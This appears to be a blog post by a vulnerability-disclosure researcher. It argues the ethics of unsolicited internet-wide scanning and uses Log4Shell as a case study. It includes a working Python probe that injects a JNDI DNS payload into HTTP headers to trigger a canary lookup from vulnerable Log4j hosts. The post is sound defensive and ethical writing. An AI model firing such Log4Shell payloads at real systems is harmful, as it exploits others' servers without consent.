I often send emails to people I’ve never met, about systems they didn’t know were vulnerable, warning them about risks they never asked me to find. Often, they’re surprised. Mostly grateful. Occasionally hostile.
I can understand the discomfort. On the surface, without more context, it can feel intrusive. Who asked me to scan their infrastructure? Who gave me permission to notify them about something they didn’t request? Yet I’ve come to realize that in cybersecurity, waiting for consent is a luxury we cannot always afford. Sometimes, when a vulnerability threatens publicly accessible systems, the consequences of inaction quickly outweigh the social comfort of protocol.
Ethics of Vulnerability Disclosure
At the Dutch Institute for Vulnerability Disclosure (DIVD), I work in a team that operates in that uncomfortable space between respecting boundaries and preventing harm. It’s not a line we walk casually; it’s one I’ve learned to approach with both caution and conviction. That’s why, at DIVD, we rely on a shared Code of Conduct (CoC). This CoC is derived from a policy published by the Dutch Public Prosecutor in 2020, which describes the circumstances under which computer hacking will be considered ethical and exempt from prosecution. The policy is based on years of debate and legal jurisprudence and has served the Dutch hacker community well. The questions it provides to determine whether an action is ethical are as follows:
- Was the action taken in the context of a significant public interest?
- Was the conduct proportionate (i.e., did the suspect not go further than necessary to achieve their objective)?
- Was the requirement of subsidiarity met (i.e., were there no less intrusive means available to achieve the intended objective)?
The DIVD CoC guides our decisions to make sure we do not cross any ethical boundaries. This can get knotty quite quickly, as we attempt to locate everyone worldwide who may be vulnerable to a particular security vulnerability. Worldwide vulnerability scans therefore demand well-considered decisions: we have to be sure that we do not intrude further than necessary and that our way of scanning is the least impactful one available.
I’ve found myself to be increasingly exacting about this. If a scan doesn’t meet the ethical standards we’ve committed to at DIVD, I will argue against executing it, even if that means walking away from a serious case. That may seem overly cautious, but it raises a deeper ethical question: when is a vulnerability severe enough that inaction becomes the more problematic choice?
This post argues that the ethical frameworks implicitly used by DIVD, particularly threshold deontology, provide a defensible basis for more intrusive forms of unsolicited vulnerability disclosure when the public interest is at stake.
When inaction becomes the problem
Ethics has always been a topic of discussion in the computer security landscape. Recently, the academic debate seems to have picked up around three leading frameworks and their respective ideologies:
- Consequentialism: Actions are morally right if they lead to the best overall outcomes or consequences. The use of consequentialism in this post mostly resembles utilitarianism, a type of consequentialism that focuses on the well-being of people.
- Deontology: Actions are morally right if they follow a set of moral rules or duties, regardless of the outcome.
- Virtue Ethics: Actions are morally right if they reflect the character and virtues of a good or morally exemplary person.
Though no less important, virtue ethics is not the focus of this post. The challenge we face in Coordinated Vulnerability Disclosure is not about judging moral character. It’s about operationalizing structured processes, making ethically defensible decisions under pressure, and balancing duties with consequences. These are domains where rules and outcomes matter more directly than personal virtue.
This focus is echoed by various academic studies, such as The Menlo Report and the more recent study on Computer Security Trolley Problems by Kohno et al. These studies emphasize consequentialism and deontology and intentionally leave virtue ethics out of scope. In contrast, studies of cybercrime, where intent, personal responsibility, and moral development are central, often lean more heavily on virtue ethics.
The tension between doing what is right according to principle and doing what is necessary to prevent harm lies at the center of many dilemmas in computer security. Deontology and consequentialism are often seen as opposites that lead to different outcomes when applied to the same case, which is precisely what turns such a case into a moral dilemma. For this reason, an absolutist approach to either framework may not be sufficient in practice when the intent is to prevent harm. The Stanford Encyclopedia of Philosophy addresses this limitation by describing a balance known as threshold deontology. Threshold deontology begins with a commitment to deontological principles such as minimizing intrusion and acting transparently, but it recognizes that these rules may need to be overridden when the potential harm of inaction crosses a critical threshold. In other words:
We follow the rules, until not following them becomes the more ethical choice.
Threshold deontology doesn’t abandon principles. It asks us to honor them until the consequences of strict adherence become morally unacceptable, and only then to act, with caution, in service of a societal cause.
Principles in practice
But how do we know when that threshold is actually crossed? Threshold deontology gives us the ‘philosophical permission’ to override a duty, but it doesn’t say exactly when that override is justified. This is where the principlist framework can provide guidance. Instead of relying on a single guiding rule, it asks us to weigh multiple ethical principles that often come into tension in practice. This helps us assess not just whether an action is justified, but also why, and what ethical trade-offs we are accepting in the process.
In 2021, Formosa et al. proposed a principlist framework for cybersecurity that is composed of the following five principles:
- Beneficence: Promote well-being and prevent harm
- Non-maleficence: Avoid causing harm
- Autonomy: Respect individuals’ control over their systems and data
- Justice: Ensure fairness and equitable treatment
- Explicability: Act transparently and be accountable
Formosa’s principlist framework is derived from Beauchamp and Childress’s “Four Principles” of biomedical ethics and adds a fifth principle, explicability, drawn from AI ethics (Floridi et al., 2018). When we’re considering something like a global vulnerability scan, these principles help us structure our ethical reasoning. DIVD’s scanning decisions are centered on the principle of beneficence: the obligation to prevent harm and promote public safety. When the potential benefit of scanning is low, for example when a vulnerability poses little risk or is unlikely to be exploited, we hold firm to the principles of non-maleficence (avoiding harm) and autonomy (respecting consent and responsibility). In such cases, we refrain from scanning because the ethical cost outweighs the limited benefit.
However, when the potential to prevent significant harm is high, such as when a vulnerability threatens large-scale exploitation or critical infrastructure, we may override non-maleficence and autonomy in service of that benefit. This is not a decision taken lightly. It reflects a careful ethical trade-off, where the duty to protect others justifies limited, well-controlled intrusion.
How WIDE is my fingerprint?
To teach others about fingerprinting ethics, I often use a simple heuristic, called WIDE, to assess the moral footprint of a fingerprinting technique; a sketch of how it can be applied follows the list below. WIDE stands for:
- Weaponized: Could this scanning methodology be used to cause or enable harm? Or, more practically: if the methodology involves a public Proof of Concept, does it contain any malware that we would need to neutralize first? This reflects the principle of non-maleficence.
- Intrusive: Does this scanning methodology cross any boundaries of consent, privacy, or proportionality? Does it leave any unnecessary traces on the target system? This brings autonomy and justice into view.
- Deweaponized: Is this scanning methodology deliberately designed to reduce its exploitability? This ties to beneficence, the duty to protect.
- Ethical: Would this technique hold up under scrutiny from others? Does it meet the requirements of proportionality and subsidiarity? Here, explicability becomes essential to ensure transparency about decisions and reasoning.
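WIDE is a set of questions rather than an algorithm, but it can be written down as a simple checklist. The sketch below is purely illustrative and not a DIVD tool; the class, field names, and the "needs rework" rule are my own simplification, shown only to make the gut check concrete.

```python
from dataclasses import dataclass


@dataclass
class WideAssessment:
    """Answers to the four WIDE questions for a single scanning methodology."""
    weaponized: bool    # W: could the methodology (or its public PoC) enable harm?
    intrusive: bool     # I: does it cross boundaries of consent, privacy, or proportionality?
    deweaponized: bool  # D: is it deliberately designed to reduce exploitability?
    ethical: bool       # E: would it hold up under outside scrutiny?

    def needs_rework(self) -> bool:
        """Flag the methodology for rework or team review unless every answer is favourable."""
        return self.weaponized or self.intrusive or not self.deweaponized or not self.ethical


# Example: a probe built on a public PoC that still carries its original payload.
probe = WideAssessment(weaponized=True, intrusive=False, deweaponized=False, ethical=True)
print(probe.needs_rework())  # True: strip and deweaponize the PoC before scanning
```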
When I ask myself, “How WIDE is this fingerprint?”, I’m not answering a closed question. I’m surfacing tensions. Even techniques that appear technically harmless can become ethically problematic if used carelessly, at scale, or without transparency. WIDE isn’t a substitute for principlism, but it does help bring the principles into everyday practice. It’s a kind of gut check for ethical proportionality: quick, imperfect, but useful when decisions happen fast. Of course, ethics are subjective, which is why not everyone may agree with our framing. Especially when consent is missing, ethical objections matter.
Addressing ethical objections
There are counterarguments to unsolicited scanning, such as concerns about overreach, digital trespassing, and the potential erosion of trust in security research. After all, if subjective judgment can justify compromising on a principle like explicability, ethical boundaries are allowed to shift under pressure. How do we ensure they don’t shift too far?
These are legitimate concerns. However, this is exactly why it is important to rely on structured frameworks like threshold deontology and principlism: not to escape ethical boundaries, but to make these boundaries visible, contestable, and constrained. The point isn’t that anything is allowed when societal safety is at play. It’s that sometimes, doing nothing carries a greater ethical cost than acting carefully without permission.
The public interest threshold of Log4Shell
When Log4Shell was disclosed in late 2021, it posed a severe threat to global digital infrastructure. The vulnerability was trivial to exploit, it affected countless systems, many of which were not even known to be running the software, and exploitation began within hours of public disclosure. It quickly became clear that this was not just a theoretical risk but a real-world crisis.
Log4j, the vulnerable software, was a logging component embedded in many other systems, making this a supply chain issue. The DIVD team working on this case faced a difficult question: how do you responsibly notify affected organizations across the globe, many of which had no idea they were even using Log4j?
In such a high-stakes context, the threshold for ethical intervention was clearly crossed. The potential for harm was immense: the vulnerability could lead to ransomware, data breaches, and critical infrastructure failures, disrupting society on a large scale. Because Log4j was embedded in other software rather than running as a standalone component, scanning was not possible without triggering the vulnerability itself. The considerations central to the WIDE heuristic helped assess this approach: while many actors were mass-exploiting systems at random to test for the vulnerability, DIVD’s scanning methodology was deliberately deweaponized to reduce exploitability and kept as non-intrusive as possible by avoiding persistence or harmful effects.
To achieve this, DIVD created a Log4Shell exploit that triggered a single DNS request to a Canary Token from inside the vulnerable system: an approach that was harmless and, of all options, the least intrusive. It revealed only the vulnerable IP address and nothing more. The actions taken were designed to be ethical: proportionate to the risk, grounded in subsidiarity, and subject to public scrutiny. In doing so, we aimed to maximize beneficence, minimize harm, respect justice, and uphold explicability, even where autonomy had to be limited for the sake of public safety.
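To make the mechanics concrete, here is a minimal sketch of what such a deweaponized probe could look like. It is illustrative only and not DIVD’s actual tooling: the canary domain, the choice of headers, and the use of the jndi:dns scheme (which makes a vulnerable Log4j instance perform only a DNS lookup, without contacting an LDAP server or loading any code) are assumptions made for this example.

```python
import uuid
import requests

# Hypothetical canary domain for this example; DIVD's real infrastructure differs.
CANARY_DOMAIN = "canary.example.org"


def send_probe(target_url: str) -> str:
    """Send one deweaponized Log4Shell probe to a single target.

    The payload uses the jndi:dns scheme, so a vulnerable Log4j instance
    performs exactly one DNS lookup of a unique hostname and nothing else:
    no LDAP connection, no remote class loading, no persistence.
    """
    token = uuid.uuid4().hex  # unique per target, so a DNS hit can be tied back to this probe
    payload = f"${{jndi:dns://{token}.{CANARY_DOMAIN}/probe}}"
    # Place the payload in headers that back-end applications commonly log.
    headers = {"User-Agent": payload, "X-Api-Version": payload}
    try:
        requests.get(target_url, headers=headers, timeout=5)
    except requests.RequestException:
        pass  # the HTTP response is irrelevant; only the DNS callback matters
    return token  # matched later against DNS queries observed at the canary domain
```

Matching the returned token against DNS queries seen at the canary domain reveals which addresses are vulnerable, and nothing more, which is exactly the property the WIDE questions are meant to protect.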
Conclusion: Trust through transparent ethics
Coordinated Vulnerability Disclosure isn’t just a technical challenge: it’s an ethical one. At DIVD, we don’t treat unsolicited scanning and disclosure as a loophole or an afterthought. We treat it as an action that requires justification, restraint, and transparency.
Threshold deontology provides us with the ethical architecture to act decisively when society is at risk. The principlist framework implicitly helps us navigate that threshold with clarity, so we’re not acting on instinct, but on structured ethical reasoning. I’m sharing this to explain how I think about the ethics behind unsolicited disclosure. Not because we see ourselves as above ethical rules at DIVD, but because we try to follow them as rigorously as possible, even when the path forward isn’t obvious.